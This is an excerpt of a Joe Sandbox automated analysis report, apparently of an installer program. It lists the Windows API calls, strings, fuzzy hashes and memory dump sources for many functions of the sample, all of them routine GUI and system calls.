Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ObjectSelect$Delete$Stretch
• String ID:
• API String ID: 1458357782-0
• Opcode ID: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
• Instruction ID: 052e9154069abc57648b404522aaf552eddfcc6d95cd3388d63b7ef9ce004286
• Opcode Fuzzy Hash: 8542cbb8adbe0fd8af4a730cfe3faeef428ae57c020086fb9cb954466ea4b08d
• Instruction Fuzzy Hash: 7B115C72E40619ABDB10DAD9DC86FEFB7BCEF08704F144555B614F7282C678AC418BA8
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetDC.USER32(00000000), ref: 00495519
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(00000000,00000000), ref: 0049553B
• GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495AB9), ref: 0049554F
• GetTextMetricsA.GDI32(00000000,?), ref: 00495571
• ReleaseDC.USER32(00000000,00000000), ref: 0049558E
Strings
• ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00495546
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Text$CreateExtentFontIndirectMetricsObjectPointReleaseSelect
• String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
• API String ID: 2948443157-222967699
• Opcode ID: a4d12ece59ca6c64cb8c4defcdc73c5f067a9176de86fed221050984d74d5100
• Instruction ID: fbfe8d588f566b1ae935688c8d8bbf43f3780a3d17a9f30f48774e54417b88ea
• Opcode Fuzzy Hash: a4d12ece59ca6c64cb8c4defcdc73c5f067a9176de86fed221050984d74d5100
• Instruction Fuzzy Hash: 98018476A04704BFEB05DBE9CC41E5EB7EDEB48714F614476F604E7281D678AE008B28
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetCursorPos.USER32 ref: 004233AF
• WindowFromPoint.USER32(?,?), ref: 004233BC
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233CA
• GetCurrentThreadId.KERNEL32 ref: 004233D1
• SendMessageA.USER32(00000000,00000084,?,?), ref: 004233EA
• SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423401
• SetCursor.USER32(00000000), ref: 00423413
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
• String ID:
• API String ID: 1770779139-0
                                                                                                                                                                                                                                  • Opcode ID: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                                                                                                                                                                  • Instruction ID: 22bb490dc700fc35bbf8fe9eba0271ced42fa0644d0760cf779c582944844a3d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 134875e674979cd567c136abb418dc525a6250aa5b529fa10794d0eebf3240cc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA01D4223046103AD6217B755D82E2F26E8DB85B15F50407FF504BB283DA3D9D11937D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0049533C
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00495349
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00495356
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
• API String ID: 667068680-2254406584
• Opcode ID: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
• Instruction ID: d6622564654ba01390171a2dbbf88ec7785202fdd48675fe733a6c53722864ad
• Opcode Fuzzy Hash: 5579b8dc187442e7c517f6558358e9e0fd6dcc5405420102cd7b083255a2d8af
• Instruction Fuzzy Hash: 7EF0F692741F156ADA3121660C41B7F6B8CCB917B1F240137BE44A7382E9ED8C0047ED
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D691
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D6A1
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D6B1
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressProc
• String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
• API String ID: 190572456-212574377
• Opcode ID: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
• Instruction ID: 26f5c6c79611f6cc0facecefa5b4932716cc5d8e9f8ea2477ead0514974f6e87
• Opcode Fuzzy Hash: 0c00d940adfee3eed657d73ca32928dd6beaef8d72542be6af97d79d08c28db7
• Instruction Fuzzy Hash: 0EF01DB0D00705DFD724EFB6ACC672736D5AB6831AF50813B990E95262D778045ACF2C
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004812C8), ref: 0042EA35
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA3B
• InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA4C
  • Part of subcall function 0042E9AC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
  • Part of subcall function 0042E9AC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
  • Part of subcall function 0042E9AC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
• ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA60
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
• String ID: ChangeWindowMessageFilterEx$user32.dll
• API String ID: 142928637-2676053874
• Opcode ID: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
• Instruction ID: 20967f7a279d57b19857f2ad39d34e10c6be6de8430a8d3efc5b40b14e24a4c3
• Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
• Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
• GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
• GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
• API String ID: 2238633743-1050967733
• Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
• Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
• Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
• Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
• GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
• GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
• API String ID: 667068680-222143506
• Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
• Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
• Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
• Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFocus.USER32 ref: 0041B57E
• GetDC.USER32(?), ref: 0041B58A
• GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
• GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
• GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
• ReleaseDC.USER32(?,?), ref: 0041B626
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
• String ID:
• API String ID: 2502006586-0
• Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
• Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
• Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
• Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
• SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorLast
• String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
• API String ID: 1452528299-1580325520
• Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
• Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
• Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
• Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
• GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
• GetDC.USER32(00000000), ref: 0041BDE9
• GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
• ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CapsDeviceMetricsSystem$Release
• String ID:
• API String ID: 447804332-0
• Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
• Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
• Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
• Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
• LocalFree.KERNEL32(005DE0F0,00000000,00401B68), ref: 00401ACF
• VirtualFree.KERNEL32(?,00000000,00008000,005DE0F0,00000000,00401B68), ref: 00401AEE
• LocalFree.KERNEL32(005DF0F0,?,00000000,00008000,005DE0F0,00000000,00401B68), ref: 00401B2D
• RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
• RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3782394904-0
                                                                                                                                                                                                                                  • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                                                                                                                                  • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• GetWindowLongA.USER32(?,000000EC), ref: 0047E766
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
• GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
• SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
• ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Window$Long$Show
• String ID:
• API String ID: 3609083571-0
• Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
• Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
• Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
• Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
• UnrealizeObject.GDI32(00000000), ref: 0041B27C
• SelectObject.GDI32(?,00000000), ref: 0041B28E
• SetBkColor.GDI32(?,00000000), ref: 0041B2B1
• SetBkMode.GDI32(?,00000002), ref: 0041B2BC
• SetBkColor.GDI32(?,00000000), ref: 0041B2D7
• SetBkMode.GDI32(?,00000001), ref: 0041B2E2
  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
• String ID:
• API String ID: 3527656728-0
• Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
• Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
• Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
• Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID: !nI$.tmp$_iu
• API String ID: 3498533004-584216493
• Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
• Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
• Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
• Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
  • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
  • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
• String ID: .dat$.msg$IMsg$Uninstall
                                                                                                                                                                                                                                  • API String ID: 3312786188-1660910688
                                                                                                                                                                                                                                  • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                                                                                                                                                                  • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
